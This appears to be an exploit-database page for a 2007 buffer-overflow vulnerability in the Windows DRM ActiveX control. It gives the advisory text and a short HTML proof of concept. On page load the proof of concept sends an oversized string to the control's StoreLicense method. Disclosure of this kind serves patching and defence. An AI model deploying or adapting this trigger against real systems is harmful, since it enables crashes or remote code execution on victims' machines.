header-logo
Suggest Exploit
vendor:
Windows Digital Rights Management (DRM)
by:
SecurityFocus
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Windows Digital Rights Management (DRM)
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2007

Microsoft Windows Digital Rights Management (DRM) ActiveX Control Buffer Overflow Vulnerability

Microsoft Windows Digital Rights Management (DRM) ActiveX control is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

Mitigation:

Users should exercise caution when handling untrusted input and should never accept input from untrusted sources. Additionally, users should ensure that the application is kept up-to-date with the latest security patches.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26630/info

Microsoft Windows Digital Rights Management (DRM) ActiveX control is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions. 

<html>
<script>
function test()
{
var obj;
var x;

x = "AAAA";

for (i=0;i<=21;++i)
x += x;

obj = document.getElementById(&#039;testObj&#039;);
obj.StoreLicense(x);
}
</script>
<body onload="test();">
<object id=&#039;testObj&#039;
classid="CLSID:{760c4b83-e211-11d2-bf3e-00805fbe84a6}">
</object>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR